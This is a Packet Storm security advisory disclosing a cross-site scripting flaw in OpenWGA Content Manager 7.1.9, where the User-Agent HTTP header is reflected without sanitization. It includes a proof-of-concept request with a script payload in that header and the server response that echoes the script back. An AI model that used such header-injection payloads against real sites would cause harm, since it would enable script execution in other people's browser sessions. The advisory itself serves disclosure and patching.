OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS

2016-04-13T00:00:00
ID PACKETSTORM:136681
Type packetstorm
Reporter LiquidWorm
Modified 2016-04-13T00:00:00

Description

                                        
                                            `  
OpenWGA Content Manager 7.1.9 User-Agent HTTP Header XSS Vulnerability  
  
  
Vendor: Innovation Gate GmbH  
Product web page: https://www.openwga.com  
Affected version: OpenWGA Content Manager 7.1.9 (Build 230)  
OpenWGA Admin Client 7.1.7 (Build 82)  
OpenWGA Server 7.1.9 Maintenance Release (Build 642)  
  
Summary: OpenWGA is an advanced open source java based enterprise CMS  
platform featuring real WYSIWYG, a state of the art CMS IDE and more.  
  
Desc: OpenWGA suffers from a cross-site scripting vulnerability when  
input passed via the User-Agent HTTP header is not properly sanitized  
before being returned to the user. This can be exploited to execute  
arbitrary HTML and script code in a user's browser session in context  
of an affected site.  
  
Tested on: Apache/2.2.14 (Ubuntu)  
Apache Tomcat/6.0.41  
Apache-Coyote/1.1  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5316  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5316.php  
  
  
23.02.2016  
  
--  
  
  
Request:  
--------  
  
GET /plugin-contentmanager HTTP/1.1  
Host: localhost:8080  
Accept: */*  
Accept-Language: en  
User-Agent: <script>alert(1)</script>  
Connection: close  
  
  
Response:  
---------  
  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
Set-Cookie: WGLastRedirectHex=; Path=/; Max-Age=0; HttpOnly  
Pragma: No-Cache  
Cache-Control: No-Cache  
Content-Type: text/html;charset=UTF-8  
Date: Tue, 23 Feb 2016 14:02:49 GMT  
Connection: close  
Content-Length: 1902  
  
  
<html>  
<head>  
<title>browser not supported: OpenWGA™ Content Manager Version 7.1.9 Build 230</title>  
<meta name="generator" content="OpenWGA... Server 7 'Wolf' Platform">  
  
<span style="font-weight:bold"><script>alert(1)</script></span>  
  
---  
`